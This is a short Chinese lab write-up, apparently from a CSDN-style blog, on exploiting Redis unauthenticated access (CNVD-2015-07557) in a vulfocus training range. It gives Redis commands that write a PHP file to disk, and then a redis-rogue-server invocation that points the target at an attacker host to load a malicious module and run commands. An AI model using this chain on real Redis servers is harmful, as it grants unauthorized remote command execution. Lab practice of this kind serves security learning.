vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557

目标系统的权限不够redis 用户无法写计划任务和公钥,而且也没有开放ssh端口。

主从复制getshell,写入恶意的so文件达到执行系统命令的目的。

github上有一键可以利用的脚本

https://github.com/n0b0dyCN/redis-rogue-server.git

利用条件:需要web目录有读写权限,只有读权限会失败

工具连接:redis-rogue-server

向目标写入文件(前提是目标有网站)

config set dir /tmp #创建临时目录

config set dbfilename 1.php #写入文件

set test "<?php phpinfo(); ?>" #向文件中写入内容

bgsave #保存

save #保存

证明web目录具有写权限,可以进行利用

确认靶机有可写权限后,

利用:攻击机进入到cd redis-rogue-server文件夹里面

python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP

成功后,可以执行命令

ls /tmp即可得到flag

相关推荐
上海云盾-小余17 小时前
网站频繁遭遇 SQL 注入溯源与原生漏洞修复全流程总结
数据库·sql
数据库小学妹17 小时前
国家区域医疗中心国产化改造实战:数据库选型、跨院区数据互通与踩坑经验
数据库·国产数据库·数据库选型·医疗信息化·信创数据库·医疗信创
AllData公司负责人18 小时前
数据库同步平台|AIIData数据中台实现OceanBase、达梦数据库、OpenGauss、人大金仓、Hive、TDengine 一键接入Doris
大数据·数据库·hive·mysql·oceanbase·tdengine
2603_9547083118 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
IvorySQL19 小时前
从双解析器到循环工程:IvorySQL 五年技术演进路线的深度观察
大数据·数据库·人工智能·postgresql·开源
wefg119 小时前
【MySQL】事务
数据库·mysql
黑白极客19 小时前
mysql的高可用性
数据库·mysql
一十九的酒19 小时前
Oracle 12c 标准版无缝升级企业版实战记录
数据库·oracle·标准版切换到企业版
ZhengEnCi20 小时前
S02-SpringBoot实体类新增字段对已有数据的影响及自动DDL同步机制详解
数据库·spring boot
妙码生花20 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(三十二):增加 admin_rule 模型及数据表迁移
数据库·go·ai编程